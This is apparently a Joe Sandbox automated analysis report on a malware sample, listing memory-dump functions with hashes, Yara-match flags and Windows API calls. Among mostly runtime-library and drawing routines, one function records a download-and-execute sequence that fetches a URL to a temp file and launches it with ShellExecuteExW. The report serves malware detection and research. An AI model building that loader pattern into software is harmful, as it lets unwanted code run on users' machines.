Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 024976EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: e114a8e1dd15bc6f83e9dece8229249b59545efe4b518ba0d7b5843e99a70b87
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 40D1D7B22185A20EDF2D4A3E847013BFFE1AA421A530D479FD4F7CA6C2EE24D555D760

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 02497FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 2ff1cd91a19711ef11f2096e5f873511c357c4e869f8aec352f0182ea9432992
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: A59134722090A34AEF6A463E847553FFFE15A432A530A079FD4F3CA2C5EF24D595DA20

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 02498289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 58bc820066537845c5dfd8eb285c971aa4630ab958f1ebaf903d668fe5e821c0
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 759130722090A34AEF69467E857853FFFE15A832A530A079FD4F2CA2C5FF24C565D620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 02497D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: ceb6ed164c2703431933d3f107e67ce29aef7bf2bdd6105665dd5e4c1ef5a482
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: AF9151B22190A30AEF69463D857453FFFE19A421A570A079FE4F3CB2C5EF248554D720

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 0249D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: eeda33b33dff9b20f07bdfbdd9f4ad6545a383daf2adb216929d4437a8c9450c
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 13616731E00B04EADF38FB6C8980BBF6F959F41A48F04085BE852DB3C6D7169982CB55

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 02497A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 99144836b274ddb659fc66beb18442937b241524431016a47afc579ec539c171
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: A48140B22190A34EEF69467E847453FFFE15A821A530A079FD4F2CB2C5EF248665D720

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 024987C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 58b9be14918f1d440f00fc37e96827639e54099312ecb86735a08bdafa71ead0
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1311E77720004247DE58CB3ED8B46BBEF95EBC7268B2D56BBD0414B758D322E145D620

Function 009A9893 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a9000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b1657a9231c227d8d21803fce77a00041aeee023155dab240cff20c474ee06a3
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 51117C72340100AFD754DE59DCC1FA673EAFB8A320B298069ED04CB316D679EC01C7A0

Function 02470D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8d0a441c2d4b0705bf0afeee984720ee9befd2432816eb00777e17293a30e26e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 14012672A126008FDF21CF60C904BEB33F5FB86206F1554B6D92AD7381E370A841CB80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0249E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0249E989
_free.LIBCMT ref: 0249E99F
_free.LIBCMT ref: 0249E9B0
_free.LIBCMT ref: 0249E9C1
_free.LIBCMT ref: 0249E9D8
GetCPInfo.KERNEL32(?,?), ref: 0249EA20

Part of subcall function 024A6952: _free.LIBCMT ref: 024A69BD

_free.LIBCMT ref: 0249EBCC
_free.LIBCMT ref: 0249EBDF
_free.LIBCMT ref: 0249EBED
_free.LIBCMT ref: 0249EBF8
_free.LIBCMT ref: 0249EC3A
_free.LIBCMT ref: 0249EC42
_free.LIBCMT ref: 0249EC4A
_free.LIBCMT ref: 0249EC52
_free.LIBCMT ref: 0249EC60

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: ea4dd1e2edb3804b974ab9388d5c5612ae3dc984f0881e9333345666a15f48f5
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 7DB18C71A002099FDF21DF69C890BAEBBF5BF08304F14456FE495A7351EB75A841CB20

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 024AA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024AA8A3

Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C0F
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C21
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C33
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C45
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C57
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C69
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C7B
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C8D
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C9F
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CB1
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CC3
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CD5
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CE7

_free.LIBCMT ref: 024AA898

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA8BA
_free.LIBCMT ref: 024AA8CF
_free.LIBCMT ref: 024AA8DA
_free.LIBCMT ref: 024AA8FC
_free.LIBCMT ref: 024AA90F
_free.LIBCMT ref: 024AA91D
_free.LIBCMT ref: 024AA928
_free.LIBCMT ref: 024AA960
_free.LIBCMT ref: 024AA967
_free.LIBCMT ref: 024AA984
_free.LIBCMT ref: 024AA99C

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 61d5de76b14839442d11903472a2cdec6576f1d17c1d549a5c928842c304e09d
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 963169316006109FEB30AF3AD864B5BB7FABF20790F15486FE449D7650EB75E890CA64

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02472C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02472C94
GetTempPathW.KERNEL32(00000105,?), ref: 02472CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02472CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02472CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02472D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02472D58
ShellExecuteExW.SHELL32(?), ref: 02472DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02472DE4

Strings

<, xrefs: 02472DAC

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: 22b57108b106403687976060af338e9340447ede32335b889625f8e81898c464
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 15414F7190021DAFEB20DF659C85FEAB7BCFF05745F0080EAA559A2150DFB09E858FA4

Function 0248EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D

Strings

advapi32.dll, xrefs: 0248EEF3, 0248EEF8, 0248EF14

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: be539c59c0a4feddeb50347d1f5abeb56d576b029bf47a9ed791a1a492c616bd
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: A1217CB1914651BFE7107FB4DC08A5EBBA8EF05B16F004A2AF555E3640CBBC94418FA8

